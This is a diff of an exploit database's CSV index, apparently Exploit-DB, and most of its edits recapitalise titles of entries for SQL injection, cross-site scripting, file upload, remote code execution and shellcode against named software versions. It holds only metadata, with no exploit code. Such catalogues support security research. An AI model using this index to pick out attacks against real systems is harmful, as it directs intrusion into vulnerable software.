-37664,platforms/win_x86/shellcode/37664.c,"Win32/XP SP3 (TR) - MessageBox shellcode (24 bytes)",2015-07-21,B3mB4m,win_x86,shellcode,0 +37664,platforms/win_x86/shellcode/37664.c,"Win32/XP SP3 (TR) - MessageBox Shellcode (24 bytes)",2015-07-21,B3mB4m,win_x86,shellcode,0 37620,platforms/php/webapps/37620.txt,"Joomla DOCman Component - Multiple Vulnerabilities",2015-07-15,"Hugo Santiago",php,webapps,80 37623,platforms/hardware/webapps/37623.txt,"15 TOTOLINK Router Models - Multiple Remote Code Execution Vulnerabilities",2015-07-16,"Pierre Kim",hardware,webapps,0 37624,platforms/hardware/webapps/37624.txt,"4 TOTOLINK Router Models - Cross-Site Request Forgery / Cross-Site Scripting",2015-07-16,"Pierre Kim",hardware,webapps,0 37625,platforms/hardware/webapps/37625.txt,"4 TOTOLINK Router Models - Backdoor Credentials",2015-07-16,"Pierre Kim",hardware,webapps,0 37626,platforms/hardware/webapps/37626.txt,"8 TOTOLINK Router Models - Backdoor and Remote Code Execution",2015-07-16,"Pierre Kim",hardware,webapps,0 37628,platforms/hardware/remote/37628.rb,"D-Link - Cookie Command Execution",2015-07-17,Metasploit,hardware,remote,0 -37629,platforms/php/webapps/37629.txt,"WordPress BuddyPress Activity Plus Plugin 1.5 - Cross-Site Request Forgery",2015-07-17,"Tom Adams",php,webapps,80 +37629,platforms/php/webapps/37629.txt,"Wordpress BuddyPress Activity Plus Plugin 1.5 - Cross-Site Request Forgery",2015-07-17,"Tom Adams",php,webapps,80 37630,platforms/php/webapps/37630.txt,"Hotel Booking Portal 0.1 - Multiple SQL Injections / Cross-Site Scripting",2012-08-09,"Yakir Wizman",php,webapps,0 37631,platforms/linux/local/37631.c,"GNU glibc - Multiple Local Stack Buffer Overflow Vulnerabilities",2012-08-13,"Joseph S. Myer",linux,local,0 37632,platforms/php/webapps/37632.txt,"Total Shop UK eCommerce CodeIgniter - Multiple Cross-Site Scripting Vulnerabilities",2012-08-13,"Chris Cooper",php,webapps,0 37633,platforms/php/webapps/37633.txt,"mIRC - 'projects.php' Cross-Site Scripting",2012-08-10,TayfunBasoglu,php,webapps,0 37634,platforms/php/webapps/37634.txt,"MindTouch DekiWiki - Multiple Remote File Inclusion / Local File Inclusion",2012-08-11,L0n3ly-H34rT,php,webapps,0 37635,platforms/php/webapps/37635.txt,"GalaxyScripts Mini File Host and DaddyScripts Daddy's File Host - Local File Inclusion",2012-08-10,L0n3ly-H34rT,php,webapps,0 -37636,platforms/php/webapps/37636.txt,"ShopperPress WordPress Theme - SQL Injection / Cross-Site Scripting",2012-08-02,"Benjamin Kunz Mejri",php,webapps,0 +37636,platforms/php/webapps/37636.txt,"ShopperPress Wordpress Theme - SQL Injection / Cross-Site Scripting",2012-08-02,"Benjamin Kunz Mejri",php,webapps,0 37637,platforms/php/webapps/37637.pl,"Elastix 2.2.0 - 'graph.php' Local File Inclusion",2012-08-17,cheki,php,webapps,0 37638,platforms/cgi/webapps/37638.txt,"LISTSERV 16 - 'SHOWTPL' Parameter Cross-Site Scripting",2012-08-17,"Jose Carlos de Arriba",cgi,webapps,0 37639,platforms/multiple/dos/37639.html,"Mozilla Firefox - Remote Denial of Service",2012-08-17,"Jean Pascal Pereira",multiple,dos,0 @@ -33983,15 +33983,15 @@ id,file,description,date,author,platform,type,port 37650,platforms/php/webapps/37650.txt,"1024 CMS 2.1.1 - 'p' Parameter SQL Injection",2012-08-22,kallimero,php,webapps,0 37651,platforms/php/webapps/37651.html,"Monstra - Multiple HTML Injection Vulnerabilities",2012-08-23,LiquidWorm,php,webapps,0 37652,platforms/php/webapps/37652.txt,"KindEditor - 'name' Parameter Cross-Site Scripting",2012-08-23,LiquidWorm,php,webapps,0 -37653,platforms/php/webapps/37653.txt,"WordPress Rich Widget Plugin - Arbitrary File Upload",2012-08-22,Crim3R,php,webapps,0 -37654,platforms/php/webapps/37654.txt,"WordPress Monsters Editor for WP Super Edit Plugin - Arbitrary File Upload",2012-08-22,Crim3R,php,webapps,0 +37653,platforms/php/webapps/37653.txt,"Wordpress Rich Widget Plugin - Arbitrary File Upload",2012-08-22,Crim3R,php,webapps,0 +37654,platforms/php/webapps/37654.txt,"Wordpress Monsters Editor for WP Super Edit Plugin - Arbitrary File Upload",2012-08-22,Crim3R,php,webapps,0 37655,platforms/windows/remote/37655.c,"Adobe Pixel Bender Toolkit2 - 'tbbmalloc.dll' Multiple DLL Loading Code Execution Vulnerabilities",2012-08-23,coolkaveh,windows,remote,0 37656,platforms/php/webapps/37656.txt,"PHP Web Scripts Ad Manager Pro - 'page' Parameter Local File Inclusion",2012-08-23,"Corrado Liotta",php,webapps,0 37657,platforms/windows/local/37657.txt,"Microsoft Word - Local Machine Zone Remote Code Execution",2015-07-20,"Eduardo Braun Prado",windows,local,0 37688,platforms/php/remote/37688.txt,"PHP - 'header()' HTTP Header Injection",2011-10-06,"Mr. Tokumaru",php,remote,0 37659,platforms/php/webapps/37659.txt,"phpVibe < 4.20 - Persistent Cross-Site Scripting",2015-07-20,"Filippos Mastrogiannis",php,webapps,0 37660,platforms/ios/dos/37660.txt,"Image Transfer IOS - Remote Crash PoC",2015-07-20,"Mohammad Reza Espargham",ios,dos,0 -37662,platforms/multiple/webapps/37662.txt,"Airdroid iOS / Android / Win 3.1.3 - Persistent",2015-07-20,Vulnerability-Lab,multiple,webapps,0 +37662,platforms/multiple/webapps/37662.txt,"AirDroid iOS / Android / Win 3.1.3 - Persistent Exploit",2015-07-20,Vulnerability-Lab,multiple,webapps,0 37663,platforms/linux/dos/37663.txt,"TcpDump - rpki_rtr_pdu_print Out-of-Bounds Denial of Service",2015-07-20,"Luke Arntson",linux,dos,0 37666,platforms/php/webapps/37666.txt,"Joomla! Helpdesk Pro Plugin < 1.4.0 - Multiple Vulnerabilities",2015-07-21,"Simon Rawet",php,webapps,80 37667,platforms/java/remote/37667.rb,"SysAid Help Desk 'rdslogs' - Arbitrary File Upload",2015-07-21,Metasploit,java,remote,0 @@ -34004,12 +34004,12 @@ id,file,description,date,author,platform,type,port 37674,platforms/php/webapps/37674.txt,"PHP Web Scripts Text Exchange Pro - 'page' Parameter Local File Inclusion",2012-08-24,"Yakir Wizman",php,webapps,0 37675,platforms/php/webapps/37675.txt,"Joomla! Komento Component - 'cid' Parameter SQL Injection",2012-08-27,Crim3R,php,webapps,0 37676,platforms/asp/webapps/37676.txt,"Power-eCommerce - Multiple Cross-Site Scripting Vulnerabilities",2012-08-25,Crim3R,asp,webapps,0 -37677,platforms/php/webapps/37677.txt,"WordPress Finder Plugin - 'order' Parameter Cross-Site Scripting",2012-08-25,Crim3R,php,webapps,0 +37677,platforms/php/webapps/37677.txt,"Wordpress Finder Plugin - 'order' Parameter Cross-Site Scripting",2012-08-25,Crim3R,php,webapps,0 37678,platforms/asp/webapps/37678.txt,"Web Wiz Forums - Multiple Cross-Site Scripting Vulnerabilities",2012-08-25,Crim3R,asp,webapps,0 37679,platforms/php/webapps/37679.txt,"LibGuides - Multiple Cross-Site Scripting Vulnerabilities",2012-08-25,Crim3R,php,webapps,0 37680,platforms/php/webapps/37680.txt,"Mihalism Multi Host - 'users.php' Cross-Site Scripting",2012-08-25,Explo!ter,php,webapps,0 -37681,platforms/php/webapps/37681.txt,"WordPress Cloudsafe365 Plugin - 'file' Parameter Remote File Disclosure",2012-08-28,"Jan Van Niekerk",php,webapps,0 -37682,platforms/php/webapps/37682.txt,"WordPress Simple:Press Forum Plugin - Arbitrary File Upload",2012-08-28,"Iranian Dark Coders",php,webapps,0 +37681,platforms/php/webapps/37681.txt,"Wordpress Cloudsafe365 Plugin - 'file' Parameter Remote File Disclosure",2012-08-28,"Jan Van Niekerk",php,webapps,0 +37682,platforms/php/webapps/37682.txt,"Wordpress Simple:Press Forum Plugin - Arbitrary File Upload",2012-08-28,"Iranian Dark Coders",php,webapps,0 37683,platforms/php/webapps/37683.txt,"Phorum 5.2.18 - Multiple Cross-Site Scripting Vulnerabilities",2012-08-29,"High-Tech Bridge",php,webapps,0 37684,platforms/php/webapps/37684.html,"PrestaShop 1.4.7 - Multiple Cross-Site Scripting Vulnerabilities",2012-08-29,"High-Tech Bridge",php,webapps,0 37685,platforms/xml/dos/37685.txt,"squidGuard 1.4 - Long URL Handling Remote Denial of Service",2012-08-30,"Stefan Bauer",xml,dos,0 @@ -34030,11 +34030,11 @@ id,file,description,date,author,platform,type,port 37706,platforms/linux/dos/37706.txt,"Libuser Library - Multiple Vulnerabilities",2015-07-27,"Qualys Corporation",linux,dos,0 37737,platforms/windows/local/37737.rb,"Heroes of Might and Magic III - .h3m Map file Buffer Overflow",2015-08-07,Metasploit,windows,local,0 37825,platforms/osx/local/37825.txt,"OS X 10.10.5 - XNU Privilege Escalation",2015-08-18,kpwn,osx,local,0 -37826,platforms/php/webapps/37826.txt,"WordPress 3.4.2 - Multiple Path Dislosure Vulnerabilities",2012-09-18,AkaStep,php,webapps,0 -37751,platforms/php/webapps/37751.txt,"WordPress WPTF Image Gallery 1.03 Plugin - Aribtrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80 -37752,platforms/php/webapps/37752.txt,"WordPress Recent Backups Plugin 0.7 - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80 -37705,platforms/php/webapps/37705.txt,"WordPress Unite Gallery Lite Plugin 1.4.6 - Multiple Vulnerabilities",2015-07-27,"Nitin Venkatesh",php,webapps,80 -37707,platforms/php/webapps/37707.txt,"WordPress Count Per Day Plugin 3.4 - SQL Injection",2015-07-27,"High-Tech Bridge SA",php,webapps,80 +37826,platforms/php/webapps/37826.txt,"Wordpress 3.4.2 - Multiple Path Dislosure Vulnerabilities",2012-09-18,AkaStep,php,webapps,0 +37751,platforms/php/webapps/37751.txt,"Wordpress WPTF Image Gallery 1.03 Plugin - Aribtrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80 +37752,platforms/php/webapps/37752.txt,"Wordpress Recent Backups Plugin 0.7 - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80 +37705,platforms/php/webapps/37705.txt,"Wordpress Unite Gallery Lite Plugin 1.4.6 - Multiple Vulnerabilities",2015-07-27,"Nitin Venkatesh",php,webapps,80 +37707,platforms/php/webapps/37707.txt,"Wordpress Count Per Day Plugin 3.4 - SQL Injection",2015-07-27,"High-Tech Bridge SA",php,webapps,80 37708,platforms/php/webapps/37708.txt,"Xceedium Xsuite - Multiple Vulnerabilities",2015-07-27,modzero,php,webapps,0 37709,platforms/php/webapps/37709.txt,"phpFileManager 0.9.8 - Remote Command Execution",2015-07-28,hyp3rlinx,php,webapps,0 37710,platforms/linux/local/37710.txt,"Sudo 1.8.14 - Unauthorized Privilege",2015-07-28,"daniel svartman",linux,local,0 @@ -34063,22 +34063,22 @@ id,file,description,date,author,platform,type,port 37734,platforms/php/webapps/37734.html,"Microweber 1.0.3 - Persistent Cross-Site Scripting / Cross-Site Request Forgery (Add Admin)",2015-08-07,LiquidWorm,php,webapps,80 37735,platforms/php/webapps/37735.txt,"Microweber 1.0.3 - File Upload Filter Bypass Remote PHP Code Execution",2015-08-07,LiquidWorm,php,webapps,80 37747,platforms/windows/dos/37747.py,"Havij Pro - Crash POC",2015-08-10,i_7e1,windows,dos,0 -37753,platforms/php/webapps/37753.txt,"WordPress Simple Image Manipulator Plugin 1.0 - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80 -37738,platforms/php/webapps/37738.txt,"WordPress Job Manager Plugin 0.7.22 - Persistent Cross-Site Scripting",2015-08-07,"Owais Mehtab",php,webapps,80 +37753,platforms/php/webapps/37753.txt,"Wordpress Simple Image Manipulator Plugin 1.0 - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80 +37738,platforms/php/webapps/37738.txt,"Wordpress Job Manager Plugin 0.7.22 - Persistent Cross-Site Scripting",2015-08-07,"Owais Mehtab",php,webapps,80 37739,platforms/windows/dos/37739.py,"Dell Netvault Backup 10.0.1.24 - Denial of Service",2015-08-07,"Josep Pi Rodriguez",windows,dos,20031 38106,platforms/aix/local/38106.txt,"IBM AIX High Availability Cluster Multiprocessing (HACMP) - Privilege Escalation",2015-09-08,"Kristian Erik Hermansen",aix,local,0 38107,platforms/windows/local/38107.c,"Cisco Sourcefire User Agent 2.2 - Insecure File Permissions",2015-09-08,"Glafkos Charalambous ",windows,local,0 37741,platforms/osx/dos/37741.txt,"OSX Keychain - EXC_BAD_ACCESS Denial of Service",2015-08-08,"Juan Sacco",osx,dos,0 -37824,platforms/php/webapps/37824.txt,"WordPress WP Symposium Plugin 15.1 - 'get_album_item.php' SQL Injection",2015-08-18,PizzaHatHacker,php,webapps,80 +37824,platforms/php/webapps/37824.txt,"Wordpress WP Symposium Plugin 15.1 - 'get_album_item.php' SQL Injection",2015-08-18,PizzaHatHacker,php,webapps,80 37743,platforms/linux/dos/37743.pl,"Brasero - Crash PoC",2015-08-08,"Mohammad Reza Espargham",linux,dos,0 -37744,platforms/php/webapps/37744.txt,"WordPress Video Gallery 2.7 Plugin - SQL Injection",2015-08-09,"Kacper Szurek",php,webapps,0 +37744,platforms/php/webapps/37744.txt,"Wordpress Video Gallery 2.7 Plugin - SQL Injection",2015-08-09,"Kacper Szurek",php,webapps,0 37749,platforms/lin_x86/shellcode/37749.c,"Linux/x86 - Egg Hunter Shellcode (19 bytes)",2015-08-10,"Guillaume Kaddouch",lin_x86,shellcode,0 37750,platforms/php/webapps/37750.txt,"WDS CMS - SQL Injection",2015-08-10,"Ismail Marzouk",php,webapps,80 37746,platforms/windows/remote/37746.py,"Netsparker 2.3.x - Remote Code Execution",2015-08-09,"Hesam Bazvand",windows,remote,0 -37754,platforms/php/webapps/37754.txt,"WordPress Candidate Application Form Plugin 1.0 - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80 +37754,platforms/php/webapps/37754.txt,"Wordpress Candidate Application Form Plugin 1.0 - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80 37755,platforms/windows/local/37755.c,"Windows 2003 SP2 - TCP/IP IOCTL Privilege Escalation (MS14-070)",2015-08-12,"Tomislav Paskalev",windows,local,0 37947,platforms/multiple/remote/37947.txt,"LiteSpeed Web Server - 'gtitle' parameter Cross-Site Scripting",2012-03-12,K1P0D,multiple,remote,0 -37948,platforms/php/webapps/37948.txt,"WordPress Slideshow Plugin - Multiple Cross-Site Scripting Vulnerabilities",2012-10-17,waraxe,php,webapps,0 +37948,platforms/php/webapps/37948.txt,"Wordpress Slideshow Plugin - Multiple Cross-Site Scripting Vulnerabilities",2012-10-17,waraxe,php,webapps,0 37949,platforms/linux/remote/37949.txt,"ModSecurity - POST Parameters Security Bypass",2012-10-17,"Bernhard Mueller",linux,remote,0 37950,platforms/php/webapps/37950.txt,"jCore - /admin/index.php path Parameter Cross-Site Scripting",2012-10-17,"High-Tech Bridge",php,webapps,0 37951,platforms/windows/remote/37951.py,"Easy File Sharing Web Server 6.9 - USERID Remote Buffer Overflow",2015-08-24,"Tracy Turben",windows,remote,0 @@ -34112,7 +34112,7 @@ id,file,description,date,author,platform,type,port 37784,platforms/php/webapps/37784.txt,"Pinterestclones - Security Bypass / HTML Injection Vulnerabilities",2012-09-08,DaOne,php,webapps,0 37785,platforms/php/webapps/37785.txt,"VICIDIAL Call Center Suite - Multiple SQL Injections",2012-09-10,"Sepahan TelCom IT Group",php,webapps,0 37786,platforms/php/webapps/37786.txt,"DeltaScripts PHP Links - Multiple SQL Injections",2012-09-10,L0n3ly-H34rT,php,webapps,0 -37787,platforms/php/webapps/37787.txt,"WordPress Download Monitor Plugin - 'dlsearch' Parameter Cross-Site Scripting",2012-08-30,"Chris Cooper",php,webapps,0 +37787,platforms/php/webapps/37787.txt,"Wordpress Download Monitor Plugin - 'dlsearch' Parameter Cross-Site Scripting",2012-08-30,"Chris Cooper",php,webapps,0 37788,platforms/linux/remote/37788.py,"libguac - Remote Buffer Overflow",2012-09-11,"Michael Jumper",linux,remote,0 37789,platforms/php/webapps/37789.txt,"Openfiler 2.3 - Multiple Cross-Site Scripting / Information Disclosure Vulnerabilities",2012-09-06,"Brendan Coles",php,webapps,0 37790,platforms/php/webapps/37790.txt,"FBDj - 'id' Parameter SQL Injection",2012-09-11,"TUNISIAN CYBER",php,webapps,0 @@ -34127,7 +34127,7 @@ id,file,description,date,author,platform,type,port 37943,platforms/php/webapps/37943.txt,"WebTitan - 'logs-x.php' Directory Traversal",2012-10-20,"Richard Conner",php,webapps,0 37944,platforms/php/webapps/37944.txt,"vBSEO - 'u' parameter Cross-Site Scripting",2012-06-16,MegaMan,php,webapps,0 37945,platforms/php/webapps/37945.txt,"SilverStripe 2.4.x - 'BackURL' Parameter URI Redirection",2012-10-15,"Aung Khant",php,webapps,0 -37946,platforms/php/webapps/37946.txt,"WordPress Crayon Syntax Highlighter Plugin - 'wp_load' Parameter Remote File Inclusion",2012-10-15,"Charlie Eriksen",php,webapps,0 +37946,platforms/php/webapps/37946.txt,"Wordpress Crayon Syntax Highlighter Plugin - 'wp_load' Parameter Remote File Inclusion",2012-10-15,"Charlie Eriksen",php,webapps,0 38001,platforms/windows/dos/38001.py,"freeSSHd 1.3.1 - Denial of Service",2015-08-28,3unnym00n,windows,dos,22 37798,platforms/windows/dos/37798.py,"XMPlay 3.8.1.12 - .pls Local Crash PoC",2015-08-17,St0rn,windows,dos,0 37799,platforms/windows/local/37799.py,"MASM321 11 Quick Editor - (.qeditor) 4.0g- .qse SEH Based Buffer Overflow (ASLR & SAFESEH Bypass)",2015-08-17,St0rn,windows,local,0 @@ -34138,7 +34138,7 @@ id,file,description,date,author,platform,type,port 37804,platforms/php/webapps/37804.txt,"minimal Gallery - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2012-09-17,ayastar,php,webapps,0 37805,platforms/php/webapps/37805.txt,"TAGWORX.CMS - 'cid' Parameter SQL Injection",2012-09-18,Crim3R,php,webapps,0 37806,platforms/cgi/webapps/37806.txt,"AxisInternet VoIP Manager - Multiple Cross-Site Scripting Vulnerabilities",2012-09-18,"Benjamin Kunz Mejri",cgi,webapps,0 -37807,platforms/php/webapps/37807.txt,"VBulletin 4.1.12 - 'blog_plugin_useradmin.php' SQL Injection",2012-09-18,Am!r,php,webapps,0 +37807,platforms/php/webapps/37807.txt,"vBulletin 4.1.12 - 'blog_plugin_useradmin.php' SQL Injection",2012-09-18,Am!r,php,webapps,0 37808,platforms/windows/remote/37808.py,"Easy File Management Web Server 5.6 - USERID Remote Buffer Overflow",2015-08-18,"Tracy Turben",windows,remote,0 37809,platforms/php/webapps/37809.php,"Nuts CMS - Remote PHP Code Injection / Execution",2015-08-17,"Yakir Wizman",php,webapps,80 37810,platforms/windows/dos/37810.txt,"FTP Commander 8.02 - SEH Overwrite",2015-08-18,Un_N0n,windows,dos,0 @@ -34151,21 +34151,21 @@ id,file,description,date,author,platform,type,port 37819,platforms/php/webapps/37819.txt,"PHPfileNavigator 2.3.3 - Privilege Escalation",2015-08-18,hyp3rlinx,php,webapps,80 37820,platforms/php/webapps/37820.txt,"CodoForum 3.3.1 - Multiple SQL Injections",2015-08-18,"Curesec Research Team",php,webapps,80 37821,platforms/php/webapps/37821.txt,"BigTree CMS 4.2.3 - Authenticated SQL Injection",2015-08-18,"Curesec Research Team",php,webapps,80 -37822,platforms/php/webapps/37822.txt,"WordPress WP Symposium Plugin 15.1 - Blind SQL Injection",2015-08-18,dxw,php,webapps,80 -37827,platforms/php/webapps/37827.txt,"WordPress Purity Theme - Multiple Cross-Site Scripting Vulnerabilities",2012-09-07,"Matan Azugi",php,webapps,0 +37822,platforms/php/webapps/37822.txt,"Wordpress WP Symposium Plugin 15.1 - Blind SQL Injection",2015-08-18,dxw,php,webapps,80 +37827,platforms/php/webapps/37827.txt,"Wordpress Purity Theme - Multiple Cross-Site Scripting Vulnerabilities",2012-09-07,"Matan Azugi",php,webapps,0 37828,platforms/php/webapps/37828.txt,"Poweradmin - 'index.php' Cross-Site Scripting",2012-09-20,Siavash,php,webapps,0 -37829,platforms/php/webapps/37829.txt,"WordPress MF Gig Calendar Plugin - Cross-Site Scripting",2012-09-20,"Chris Cooper",php,webapps,0 +37829,platforms/php/webapps/37829.txt,"Wordpress MF Gig Calendar Plugin - Cross-Site Scripting",2012-09-20,"Chris Cooper",php,webapps,0 37830,platforms/cgi/webapps/37830.txt,"ZEN Load Balancer - Multiple Security Vulnerabilities",2012-09-24,"Brendan Coles",cgi,webapps,0 37937,platforms/linux/local/37937.c,"Linux Kernel 3.2.x - 'uname()' System Call Local Information Disclosure",2012-10-09,"Brad Spengler",linux,local,0 37938,platforms/php/webapps/37938.txt,"OpenX - /www/admin/plugin-index.php parent Parameter Cross-Site Scripting",2012-10-10,"High-Tech Bridge",php,webapps,0 37939,platforms/php/webapps/37939.txt,"FileContral - Local File Inclusion / Local File Disclosure",2012-08-11,"Ashiyane Digital Security Team",php,webapps,0 -38066,platforms/php/webapps/38066.txt,"WordPress Video Lead Form Plugin - 'errMsg' Parameter Cross-Site Scripting",2012-11-29,"Aditya Balapure",php,webapps,0 +38066,platforms/php/webapps/38066.txt,"Wordpress Video Lead Form Plugin - 'errMsg' Parameter Cross-Site Scripting",2012-11-29,"Aditya Balapure",php,webapps,0 38067,platforms/hardware/webapps/38067.py,"Thomson Wireless VoIP Cable Modem TWG850-4B ST9C.05.08 - Authentication Bypass",2015-09-02,Orwelllabs,hardware,webapps,80 37833,platforms/php/webapps/37833.txt,"YCommerce - Multiple SQL Injections",2012-09-21,"Ricardo Almeida",php,webapps,0 37834,platforms/linux/remote/37834.py,"Samba 3.5.11/3.6.3 - Unspecified Remote Code Execution",2012-09-24,kb,linux,remote,0 -37835,platforms/php/webapps/37835.html,"WordPress 3.4.2 - Cross-Site Request Forgery",2012-09-22,AkaStep,php,webapps,0 -37836,platforms/php/webapps/37836.txt,"WordPress Token Manager Plugin - 'tid' Parameter Cross-Site Scripting",2012-09-25,TheCyberNuxbie,php,webapps,0 -37837,platforms/php/webapps/37837.html,"WordPress Sexy Add Template Plugin - Cross-Site Request Forgery",2012-09-22,the_cyber_nuxbie,php,webapps,0 +37835,platforms/php/webapps/37835.html,"Wordpress 3.4.2 - Cross-Site Request Forgery",2012-09-22,AkaStep,php,webapps,0 +37836,platforms/php/webapps/37836.txt,"Wordpress Token Manager Plugin - 'tid' Parameter Cross-Site Scripting",2012-09-25,TheCyberNuxbie,php,webapps,0 +37837,platforms/php/webapps/37837.html,"Wordpress Sexy Add Template Plugin - Cross-Site Request Forgery",2012-09-22,the_cyber_nuxbie,php,webapps,0 37838,platforms/php/webapps/37838.txt,"Neturf eCommerce Shopping Cart - 'SearchFor' Parameter Cross-Site Scripting",2011-12-30,farbodmahini,php,webapps,0 37839,platforms/linux/dos/37839.txt,"Flash - PCRE Regex Compilation Zero-Length Assertion Arbitrary Bytecode Execution",2015-08-19,"Google Security Research",linux,dos,0 37840,platforms/windows/remote/37840.txt,"Flash Broker-Based - Sandbox Escape via Forward Slash Instead of Backslash",2015-08-19,KeenTeam,windows,remote,0 @@ -34223,19 +34223,19 @@ id,file,description,date,author,platform,type,port 37892,platforms/asp/webapps/37892.txt,"Vifi Radio v1 - Cross-Site Request Forgery",2015-08-20,KnocKout,asp,webapps,80 37893,platforms/windows/dos/37893.py,"Valhala Honeypot 1.8 - Stack-Based Buffer Overflow",2015-08-20,Un_N0n,windows,dos,21 37894,platforms/php/webapps/37894.html,"Pligg CMS 2.0.2 - Arbitrary Code Execution",2015-08-20,"Arash Khazaei",php,webapps,80 -37895,platforms/win_x86-64/shellcode/37895.asm,"Windows 2003 x64 - Token Stealing shellcode (59 bytes)",2015-08-20,"Fitzl Csaba",win_x86-64,shellcode,0 -37896,platforms/php/webapps/37896.txt,"WordPress ABC Test Plugin - 'id' Parameter Cross-Site Scripting",2012-09-26,"Scott Herbert",php,webapps,0 +37895,platforms/win_x86-64/shellcode/37895.asm,"Windows 2003 x64 - Token Stealing Shellcode (59 bytes)",2015-08-20,"Fitzl Csaba",win_x86-64,shellcode,0 +37896,platforms/php/webapps/37896.txt,"Wordpress ABC Test Plugin - 'id' Parameter Cross-Site Scripting",2012-09-26,"Scott Herbert",php,webapps,0 37897,platforms/linux/dos/37897.html,"Midori Browser 0.3.2 - Denial of Service",2012-09-27,"Ryuzaki Lawlet",linux,dos,0 37898,platforms/linux/local/37898.py,"Reaver Pro - Privilege Escalation",2012-09-30,infodox,linux,local,0 37899,platforms/php/webapps/37899.txt,"Switchvox - Multiple HTML Injection Vulnerabilities",2012-10-02,"Ibrahim El-Sayed",php,webapps,0 37900,platforms/multiple/remote/37900.txt,"IBM Lotus Notes Traveler 8.5.1.x - Multiple Input Validation Vulnerabilities",2012-09-28,MustLive,multiple,remote,0 37901,platforms/php/webapps/37901.txt,"AlamFifa CMS - 'user_name_cookie' Parameter SQL Injection",2012-09-30,L0n3ly-H34rT,php,webapps,0 -37902,platforms/php/webapps/37902.php,"WordPress Akismet Plugin - Multiple Cross-Site Scripting Vulnerabilities",2012-10-01,"Tapco Security",php,webapps,0 -37903,platforms/php/webapps/37903.txt,"Zenphoto - 'admin-news-articles.php' Cross-Site Scripting",2012-10-02,"Scott Herbert",php,webapps,0 +37902,platforms/php/webapps/37902.php,"Wordpress Akismet Plugin - Multiple Cross-Site Scripting Vulnerabilities",2012-10-01,"Tapco Security",php,webapps,0 +37903,platforms/php/webapps/37903.txt,"ZenPhoto - 'admin-news-articles.php' Cross-Site Scripting",2012-10-02,"Scott Herbert",php,webapps,0 37904,platforms/php/webapps/37904.txt,"Omnistar Mailer - Multiple SQL Injections / HTML Injection Vulnerabilities",2012-10-01,"Vulnerability Laboratory",php,webapps,0 37905,platforms/windows/dos/37905.rb,"PowerTCP WebServer for - ActiveX Denial of Service",2012-09-28,catatonicprime,windows,dos,0 -37906,platforms/php/webapps/37906.txt,"WordPress Googmonify Plugin 0.8.1 - Cross-Site Scripting / Cross-Site Request Forgery",2015-08-21,"Ehsan Hosseini",php,webapps,80 -37907,platforms/php/webapps/37907.txt,"WordPress MDC Private Message Plugin 1.0.0 - Persistent Cross-Site Scripting",2015-08-21,"Chris Kellum",php,webapps,80 +37906,platforms/php/webapps/37906.txt,"Wordpress Googmonify Plugin 0.8.1 - Cross-Site Scripting / Cross-Site Request Forgery",2015-08-21,"Ehsan Hosseini",php,webapps,80 +37907,platforms/php/webapps/37907.txt,"Wordpress MDC Private Message Plugin 1.0.0 - Persistent Cross-Site Scripting",2015-08-21,"Chris Kellum",php,webapps,80 37908,platforms/windows/dos/37908.py,"Konica Minolta FTP Utility 1.0 - Remote Denial of Service PoC",2015-08-21,"Shankar Damodaran",windows,dos,21 37909,platforms/windows/dos/37909.txt,"Microsoft Office 2007 - wwlib.dll fcPlcfFldMom Uninitialized Heap Usage",2015-08-21,"Google Security Research",windows,dos,0 37910,platforms/windows/dos/37910.txt,"Microsoft Office 2007 - wwlib.dll Type Confusion (MS15-081)",2015-08-21,"Google Security Research",windows,dos,0 @@ -34262,13 +34262,13 @@ id,file,description,date,author,platform,type,port 37931,platforms/php/webapps/37931.txt,"Netsweeper 3.0.6 - Authentication Bypass",2015-08-21,"Anastasios Monachos",php,webapps,0 37932,platforms/php/webapps/37932.txt,"Netsweeper 4.0.8 - Arbitrary File Upload and Execution",2015-08-21,"Anastasios Monachos",php,webapps,0 37933,platforms/php/webapps/37933.txt,"Netsweeper 4.0.8 - Authentication Bypass",2015-08-21,"Anastasios Monachos",php,webapps,0 -37934,platforms/php/webapps/37934.txt,"WordPress Shopp Plugin - Multiple Security Vulnerabilities",2012-10-05,T0x!c,php,webapps,0 +37934,platforms/php/webapps/37934.txt,"Wordpress Shopp Plugin - Multiple Security Vulnerabilities",2012-10-05,T0x!c,php,webapps,0 37935,platforms/php/webapps/37935.txt,"Interspire Email Marketer - (Cross-Site Scripting / HTML Injection / SQL Injection) Multiple Vulnerabilities",2012-10-08,"Ibrahim El-Sayed",php,webapps,0 37936,platforms/php/webapps/37936.txt,"Open Realty - 'select_users_lang' Parameter Local File Inclusion",2012-10-06,L0n3ly-H34rT,php,webapps,0 37952,platforms/windows/remote/37952.py,"Easy Address Book Web Server 1.6 - USERID Remote Buffer Overflow",2015-08-24,"Tracy Turben",windows,remote,0 37954,platforms/windows/dos/37954.py,"Mock SMTP Server 1.0 - Remote Crash PoC",2015-08-24,"Shankar Damodaran",windows,dos,25 37955,platforms/php/webapps/37955.html,"Pligg CMS 2.0.2 - Cross-Site Request Forgery (Add Admin) Exploit",2015-08-24,"Arash Khazaei",php,webapps,80 -37956,platforms/php/webapps/37956.txt,"WordPress GeoPlaces3 Theme - Arbitrary File Upload",2015-08-24,Mdn_Newbie,php,webapps,80 +37956,platforms/php/webapps/37956.txt,"Wordpress GeoPlaces3 Theme - Arbitrary File Upload",2015-08-24,Mdn_Newbie,php,webapps,80 37957,platforms/windows/dos/37957.txt,"GOM Audio 2.0.8 - (.gas) Crash POC",2015-08-24,Un_N0n,windows,dos,0 37958,platforms/multiple/remote/37958.rb,"Firefox - PDF.js Privileged Javascript Injection",2015-08-24,Metasploit,multiple,remote,0 37959,platforms/php/webapps/37959.txt,"BSW Gallery - 'uploadpic.php' Arbitrary File Upload",2012-10-18,"cr4wl3r ",php,webapps,0 @@ -34282,7 +34282,7 @@ id,file,description,date,author,platform,type,port 37967,platforms/windows/dos/37967.txt,"Microsoft Office 2007 - Malformed Document Stack-Based Buffer Overflow",2015-08-25,"Google Security Research",windows,dos,0 37968,platforms/php/webapps/37968.txt,"CMS Mini 0.2.2 - 'index.php' Script Cross-Site Scripting",2012-10-19,Netsparker,php,webapps,0 